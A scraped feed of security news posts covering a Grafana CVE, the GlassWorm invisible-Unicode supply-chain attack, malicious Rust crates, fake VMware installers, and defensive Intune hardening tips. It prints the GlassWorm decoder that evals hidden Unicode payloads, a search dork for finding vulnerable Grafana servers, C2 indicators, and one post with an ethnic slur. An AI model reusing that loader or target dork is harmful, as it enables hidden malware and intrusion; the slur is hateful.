Watch3r

🚨 CVE-2026-27876: RCE on Grafana via sqlExpressions Critical RCE via SQL Expressions + Enterprise Plugin Chain! An attacker exploits the enabled sqlExpressions feature toggle in Grafana OSS to inject malicious SQL expressions that, when processed by a vulnerable Grafana Enterprise plugin (e.g., for data transformation or dashboard scripting), triggers deserialization or code evaluation leading to remote arbitrary code execution. Full Vulnerability Details & Analysis at DarkEye: 🔗 darkeye.org/vuln/cve/CVE-2… 🔍 Identify Targets via ZoomEye: Filter: vul.cve="CVE-2026-27876" Search Dork: app="Grafana" Exposure: 83k+ instances identified globally. ZoomEye Search Link: 👉 zoomeye.ai/searchResult?q… #Grafana #RCE #SQLInjection #ChainedVuln #EnterpriseRisk #DarkEye

We have adjusted the scoring on the advisory to reflect server-side mitigations that the vendor described during the disclosure process.

🚨‼️ EXCLUSIVE: Zoom was breached by threat actor Mr. Raccoon. A South Korean employee installed an infostealer via a fake Zoom-themed website, delivered through a spoofed security email. Mr. Raccoon told us: "Their security was terrible, but Okta saved them."

For those of you playing around at home with the LiteLLM supply chain stuff. Here are the decoded payloads and other info. github.com/HackingLZ/lite…

🚨 BREAKING: The cybersecurity industry is about to get completely disrupted. Someone just open-sourced a fully autonomous AI Red Team. It's called PentAGI. 8,200+ stars on GitHub. Not one AI agent. An entire simulated security firm. Researchers, developers, pentesters, and risk analysts. All AI. All coordinating with each other before launching a single attack. No Cobalt Strike. No $100K/year pentest retainers. No OSCP required. Here's what's inside this thing: → An Orchestrator agent that plans the full attack chain → A Researcher agent that gathers intel from the web, search engines, and vulnerability databases → A Developer agent that writes custom exploit code on the fly → An Executor agent that runs 20+ pro security tools (nmap, metasploit, sqlmap, and more) → A memory system that learns from every engagement and gets smarter over time Here's the wildest part: It runs everything inside sandboxed Docker containers. Full isolation. It picks the right container image for each task automatically. It has a knowledge graph powered by Neo4j that tracks relationships between targets, vulnerabilities, tools, and techniques across every single test. Cybersecurity firms charge $25K-$150K per engagement for this exact workflow. This is free. 100% Open Source. MIT License.

Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:

Telegram fights back in Russia: "Telegram proxies are currently launching a counter-attack against Roskomnadzor’s (RKN) censorship infrastructure, flooding its filters with junk data and overloading them to a critical state. As a result, not only is Telegram suffering, but so is a host of other services—including those the authorities had intended to leave alone. Consequently, service disruptions are being observed nationwide, even affecting platforms that were never targeted for blocking—such as websites on RKN’s "whitelist," certain government services, and occasionally even VKontakte. An interesting side effect has emerged: in several regions, WhatsApp (specifically voice and video calls) has suddenly sprung back to life. This occurred because the TSPU (Technical Means of Countering Threats) system temporarily "eased up" on certain filters in an attempt to cope—however imperfectly—with the massive primary load generated by Telegram. This is currently one of the most widely discussed instances of "technical trolling" directed at RKN in recent years. I have a feeling that Durov’s team is going to make life very difficult for RKN in the future—especially when comparing the skill levels and salaries of Durov’s programmers against those of RKN’s mediocre coders, who are scraping by on peanuts. (After all, the truly talented programmers have either emigrated or are working for private companies.) t.me/borisenkoD/336…

Taken from the Stryker Handala / Intune Detection Pack v2 "Check PIM role settings for Global Administrator, Intune Administrator, and Cloud Device Administrator. If you see only the "Require Azure MFA" checkbox and no Authentication Context configured, you have the same gap that enabled the Stryker wipe. Configure Authentication Context with FIDO2 or certificate-based auth today. Enable Intune Multi-Admin Approval for wipe, retire, and delete actions. Tenant Administration > Multi Admin Approval. Under 10 minutes. No additional licensing required. Deploy Rule 13 (bulk wipe threshold alert). Five wipes in 15 minutes from a single identity fires the alert. Wire it to a Logic App that calls revokeSignInSessions on the triggering account via Microsoft Graph. " link to Detection Pack v2 blog and direct download. Please share so others can lock down their InTune environments please threathunter.ai/blog/iran-hand…

🚨 45,000 malicious IP addresses taken down in global operation targeting phishing, malware and ransomware Coordination across 72 countries and territories led to: 🔵 94 arrests 🔵 110 suspects under investigation 🔵 202 electronic devices and servers seized Cases revealed a range of cyber-enabled fraud schemes, from phishing websites and identity theft to hacked social media accounts, as well as romance scams, sextortion and financial fraud. Read more ➡️ 🔗 bit.ly/4bmvkTs

#Linux: AppArmor hit by 9 "#CrackArmor" vulnerabilities letting unprivileged users manipulate security profiles and escalate to root. The bugs date back to 2017 and affect 4.11+ kernels of Ubuntu, Debian, and SUSE: #PrivilegeEscalaton #CloudSecurity 👇 thehackernews.com/2026/03/nine-c…

Handala Hack is an online persona operated by Void Manticore (aka Red Sandstorm, Banished Kitten), an actor affiliated with Iranian Ministry of Intelligence and Security (MOIS) Check Point Research research.checkpoint.com/2026/handala-h… @_CPResearch_

🚨 𝟭𝟱𝟬+ 𝗚𝗶𝘁𝗛𝘂𝗯 𝗿𝗲𝗽𝗼𝘀𝗶𝘁𝗼𝗿𝗶𝗲𝘀 𝗰𝗼𝗺𝗽𝗿𝗼𝗺𝗶𝘀𝗲𝗱 𝗯𝘆 𝗚𝗹𝗮𝘀𝘀𝗪𝗼𝗿𝗺 𝗠𝗮𝗹𝘄𝗮𝗿𝗲 [LIVE] A new wave of the invisible Unicode supply chain attack has hit GitHub, the same technique we first detected in malicious npm packages in March 2025, later named GlassWorm. The attack hides malware inside Unicode characters that render as nothing, meaning the payload looks like an empty string during code review. Example of the decoder pattern we’re seeing injected: 𝘤𝘰𝘯𝘴𝘵 𝘴 = 𝘷 => [...𝘷].𝘮𝘢𝘱(𝘸 => ( 𝘸 = 𝘸.𝘤𝘰𝘥𝘦𝘗𝘰𝘪𝘯𝘵𝘈𝘵(0), 𝘸 >= 0𝘹𝘍𝘌00 && 𝘸 <= 0𝘹𝘍𝘌0𝘍 ? 𝘸 - 0𝘹𝘍𝘌00 : 𝘸 >= 0𝘹𝘌0100 && 𝘸 <= 0𝘹𝘌01𝘌𝘍 ? 𝘸 - 0𝘹𝘌0100 + 16 : 𝘯𝘶𝘭𝘭 )).𝘧𝘪𝘭𝘵𝘦𝘳(𝘯 => 𝘯 !== 𝘯𝘶𝘭𝘭); 𝘦𝘷𝘢𝘭(𝘉𝘶𝘧𝘧𝘦𝘳.𝘧𝘳𝘰𝘮(𝘴(``)).𝘵𝘰𝘚𝘵𝘳𝘪𝘯𝘨('𝘶𝘵𝘧-8')); That backtick string 𝘧𝘳𝘰𝘮(𝘴(``) looks empty, but actually contains 9,000 invisible characters that decode into the real malicious payload at runtime. Some notable compromised repositories include: ⭐ pedronauck/reworm — 1,460 stars ⭐ pedronauck/spacefold — 62 stars ⭐ anomalyco/opencode-bench — 56 stars ⭐ doczjs/docz-plugin-css — 39 stars ⭐ uknfire/theGreatFilter — 38 stars We’re also seeing the same technique appear in npm packages and a VS Code extension, showing a coordinated push across ecosystems. Full write-up below 👇 (coming)

🛑 Attackers turned the nx npm supply-chain compromise into full AWS admin access in under 72 hours. Google says UNC6426 stole a developer’s GitHub token via QUIETVAULT, abused GitHub-to-AWS OIDC trust, created a new admin role, then accessed S3 data and destroyed production systems. 🔗 Read → thehackernews.com/2026/03/unc642…

The Russian government is teaching a whole new generation of filthy Russian barbarians all the techniques of ripping apart the west with disinformation. Meanwhile, western governments mostly refuse to counter it in any way.

🦀 5 malicious Rust crates posed as time utilities and attempted to exfiltrate .env secrets from developer environments. Our research uncovered a coordinated campaign using lookalike infrastructure to steal credentials. Read the analysis → socket.dev/blog/5-malicio… #Rustlang

Deep breakdown of the Shotbird Chrome extension malware I covered last week including the Clickfix style Chrome update malware. Worth the read. monxresearch-sec.github.io/shotbird-exten…

⚠️Watch out for a SEO poisoning campaign impersonating VMware vSphere downloads leveraging MeshCentral RMM tool bundled into fake installers targeting enterprise environments. Sample: dbfe1f915f40122a336cd5d0de802a6f3ec0204ab75321934a06dafbc1964446 Detonation: app.any.run/tasks/e0937ead… From malicious search results -> vmware-vsphere[.]com (associates, vmwarevsphere[.]com, vmware-remote-console[.]com, remote-console-vmware[.]com, vsphere-client[.]com, vsphere-client[.]org ) leading to vmware-repository[.]com A malicious build with EV signature issued to malicious signer "Pacex Learning Private Limited" (Globalsign) is delivered from Dropbox. The build connects to 103.65.230.86 (MeshCentral RMM C2) and installs legit VMware product as decoy

We’ve discovered a massive campaign using 30k-plus hostnames to distribute a #BrowserExtension named "OmniBar AI Chat and Search." This extension overrides the browser homepage and uses an attacker-controlled domain for #SearchHijacking. Details at bit.ly/4dbRVED

Anthropic dropped a 33 pages cheat sheet for building Claude skills resources.anthropic.com/hubfs/The-Comp…